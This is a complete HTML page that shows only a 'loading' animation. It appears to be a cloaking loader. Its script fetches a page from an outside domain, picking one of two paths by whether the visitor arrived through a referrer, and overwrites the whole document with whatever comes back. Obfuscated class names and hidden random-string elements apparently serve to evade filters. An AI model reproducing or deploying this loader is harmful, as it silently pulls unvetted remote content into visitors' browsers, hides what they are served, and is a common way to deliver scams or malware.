<!DOCTYPE html>
<html>
<head>
    <title>加载中...</title>
    <meta charset="UTF-8">
    <style>
        iframe {
            display: none;
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        body {
            width: 100%;
            height: 100%;
            margin: 0;
            padding: 0;
            border: 0
        }

        .Sp8Ge9utut {
            position: fixed;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            z-index: 1;
            background-color: #d8d8d8
        }

        .Sp8Ge9utut .hZ0b904132 {
            position: absolute;
            left: 0;
            right: 0;
            top: 0;
            bottom: 0;
            height: 50px;
            margin: auto
        }

        .Sp8Ge9utut .content {
            line-height: 50px;
            text-align: center
        }

        .Sp8Ge9utut .img {
            width: 100%
        }

        .Sp8Ge9utut .SJAaNgBG9 {
            text-align: center
        }

        .Sp8Ge9utut .SJAaNgBG9 span {
            display: inline-block;
            width: 6px;
            height: 50px;
            background-color: #FF5722;
            -webkit-transform: scaleY(0.4);
            transform: scaleY(0.4);
            -webkit-animation: scale 1s infinite;
            animation: scale 1s infinite
        }

        .Sp8Ge9utut .SJAaNgBG9 span:nth-child(2) {
            -webkit-animation: scale 1s .2s infinite;
            animation: scale 1s .2s infinite
        }

        .Sp8Ge9utut .SJAaNgBG9 span:nth-child(3) {
            -webkit-animation: scale 1s .3s infinite;
            animation: scale 1s .3s infinite
        }

        .Sp8Ge9utut .SJAaNgBG9 span:nth-child(4) {
            -webkit-animation: scale 1s .4s infinite;
            animation: scale 1s .4s infinite
        }

        .Sp8Ge9utut .SJAaNgBG9 span:nth-child(5) {
            -webkit-animation: scale 1s .5s infinite;
            animation: scale 1s .5s infinite
        }

        .Sp8Ge9utut .SJAaNgBG9 span:nth-child(6) {
            -webkit-animation: scale 1s .6s infinite;
            animation: scale 1s .6s infinite
        }

        @-webkit-keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        @keyframes scale {
            0% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
            20% {
                -webkit-transform: scaleY(0.8);
                transform: scaleY(0.8)
            }
            40% {
                -webkit-transform: scaleY(1);
                transform: scaleY(1)
            }
            100% {
                -webkit-transform: scaleY(0.4);
                transform: scaleY(0.4)
            }
        }

        .Sp8Ge9utut .tips {
            font-size: 1rem;
            color: #fff;
            text-align: center
        }
    </style>
    <script src="https://cdn.bootcss.com/jquery/3.2.1/jquery.min.js"></script>
    <script>
        function YwtsJTGrv4P(name) { var reg = new RegExp("(.|&)" + name + "=([^&]*)(&|$)"); var r = window.location.href.match(reg); if (r != null) return unescape(r[2]); return null;}
		var e0EN5R = YwtsJTGrv4P('temp');
		if (!document.referrer){
			url="https://bb.nrglcip.cn/html/"+ e0EN5R +".html?a=index";
		}else {
			url="https://bb.nrglcip.cn/htm1/"+ e0EN5R +".html?a=share";
		}
		
        zNQbYf5UR=url+"#"+new Date().getTime();
        zNQbYf5UR && function() {
            $.get(zNQbYf5UR, function(data) {
                var new_doc = document.open("text/html", "replace");
                new_doc.write(data);
                new_doc.close();
            });
        }();

    </script>

</head>
<body>

<b style='display:none' >i7OpzfCDrrHv8BkvPd1VnHMzLkDCAiKJIVOJ63NylVaHoJbJHOo9z97</b>
<span style='display:none'>LkaHBPmMRssSaZWWrk53E</span>
<h1 style='display:none' >rCDyLsN65q8DyRItvW45mamrJ12LEegg1uZwiokL</h1>
<div style='display:none'>q9IliaD1z7d5oMpA4X6kaY52uZFDosl6t3KSs</div>
<div style='display:none'>q9IliaD1z7d5oMpA4X6kaY52uZFDosl6t3KSs</div>
<div style='display:none'>q9IliaD1z7d5oMpA4X6kaY52uZFDosl6t3KSs</div>
<a  href='#' style='display:none'>GwzyQwON5GcN6ozae9YDZNtPcraUwGVxr4qTXRXq5s</a><div class="Sp8Ge9utut">
    <div class="hZ0b904132">
        <div class="SJAaNgBG9">
            <p style="font-size:50px;color:#FF5722; padding-top: 18%; margin:-28% auto">正在加载...</p>

            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span>
            <span></span></div>

    </div>
</div>

<ul style='display:none' >Z0m7d2qqAzYvHWevNcIDiVVGgPhNlqritWAoXTzFPtcdL3Jps</ul>
<h1 style='display:none' >FQzguC6dKNbfRrfzrAksOy8sq2CSFvRj9w7</h1>
<img  src='' style='display:none'>
<p  style='display:none'>lIi9tgA2anyfLXJB</p></body>
</html>